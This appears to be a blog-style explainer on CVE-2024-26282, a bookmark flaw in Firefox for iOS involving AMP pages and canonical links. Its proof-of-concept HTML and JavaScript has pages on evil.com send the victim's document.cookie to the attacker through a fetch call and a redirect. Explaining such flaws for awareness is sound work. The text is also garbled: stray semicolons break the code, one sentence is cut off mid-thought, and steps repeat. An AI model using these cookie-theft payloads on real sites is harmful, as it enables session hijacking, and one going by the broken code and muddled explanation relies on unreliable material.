CVE-2024-26282 - Bookmark Exploit in Firefox for iOS Using AMP and Canonical Links

In early 2024, a security vulnerability was discovered in Firefox for iOS (versions before 123) that could allow an attacker to run malicious JavaScript through a clever use of Accelerated Mobile Pages (AMP) URLs and canonical link elements. Tracked as CVE-2024-26282, this bug posed a risk to users who bookmarked specific web pages and then opened them, potentially leading to unexpected code execution. This article breaks down how the exploit works, shows code examples, and provides useful tips to stay safe.

Background

- AMP (Accelerated Mobile Pages): An open-source project by Google to speed up mobile web pages. AMP URLs often look like https://www.google.com/amp/s/[site]/....
- Canonical Link Element: An HTML tag (<link rel="canonical" href="...">) used to tell search engines the "official" or original version of a page.

A malicious JavaScript payload,

they could craft a scenario where a user bookmarks a page and, when they open it again, the browser executes unintended JavaScript — even if it came from an untrusted source.

The Core of the Vulnerability

When a user visits an AMP page and bookmarks it, Firefox for iOS stored the AMP URL but resolved the canonical URL as the actual destination. If the canonical URL referenced a malicious page and the AMP page contained user-controllable JavaScript, reopening the bookmark could trigger this JavaScript to run under unexpected circumstances.

When user opens the bookmark:

Firefox for iOS loads the canonical page (attacker’s site), which may run attacker-controlled JavaScript.

Suppose an attacker controls evil.com. They create a malicious AMP page

<!DOCTYPE html>
<html amp>
<head>
  <meta charset="utf-8">
  <title>Malicious AMP Page</title>
  <link rel="canonical" href="https://evil.com/payload.html">;
  <script async src="https://cdn.ampproject.org/v.js"></script>;
</head>
<body>
  <p>This is a harmless looking page. Bookmark me!</p>
</body>
</html>

And on https://evil.com/payload.html

<!DOCTYPE html>
<html>
<head>
  <title>Payload</title>
  <script>
    // Malicious code: Steal cookies or data
    fetch('https://evil.com/steal?cookie='; + document.cookie);
    alert('Your info has been stolen!');
  </script>
</head>
<body>
  <h1>Oops!</h1>
</body>
</html>

- User visits the AMP page via Google Search or a direct link (the URL resembles https://www.google.com/amp/s/evil.com/page1.html).

User bookmarks this page in Firefox for iOS.

- When the bookmark is reopened, due to a bug, the browser loads the canonical page (payload.html from evil.com), executing the attacker's JavaScript in the context of the user.

Why is This Dangerous?

- Bookmark Trust: Users trust their bookmarks, so they might not notice they’re opening a manipulated or malicious page — especially if the bookmarked AMP page looked safe.
- Bypassing Filters: Since AMP URLs look legitimate, security tools and users might not realize they're being sent to an attacker’s site.

Step 1: The attacker gets the user to bookmark the AMP page

<!-- https://amp.evil.com/bookmarkme.html -->
<html amp>
<head>
  <meta charset="utf-8">
  <title>Hey, Save Me!</title>
  <link rel="canonical" href="https://evil.com/trigger.html">;
  <script async src="https://cdn.ampproject.org/v.js"></script>;
</head>
<body>
  <h1>Add this page to your bookmarks for free stuff!</h1>
</body>
</html>

Step 2: The canonical URL points to a payload

<!-- https://evil.com/trigger.html -->
<html>
<head>
  <title>Attack!</title>
  <script>
    // Anything here will run when user opens the bookmark
    window.location = "https://evil.com/phishing?data="; + btoa(document.cookie);
  </script>
</head>
<body>
  <p>Redirecting you...</p>
</body>
</html>

Affected: Firefox for iOS versions less than 123

- Not Affected: Firefox for Android, desktop Firefox, and other browsers. But always use updated browsers for best security!

Be Careful of Canonical manipulation: Avoid bookmarking AMP URLs unless you trust the site.

## More Information / Official References

Mozilla Advisory:

MFSA 2024-17: Security Vulnerabilities fixed in Firefox for iOS 123

Original Bug Report:

Bugzilla Mozilla Bug 188137 *(may require login)*

CVE Entry:

CVE-2024-26282 detail at NVD

AMP Project:

AMP Documentation

Conclusion

CVE-2024-26282 is a clear example of how combining web features (like AMP and canonical links) can sometimes produce unexpected browser behavior leading to a security risk. Users who keep their Firefox for iOS updated and stay cautious when bookmarking unfamiliar AMP pages will stay protected.

Stay safe and always update your browser!

*If you found this article helpful, share it with your friends and follow for more up-to-date security info!*

Timeline

Published on: 02/22/2024 15:15:08 UTC
Last modified on: 11/06/2024 23:35:00 UTC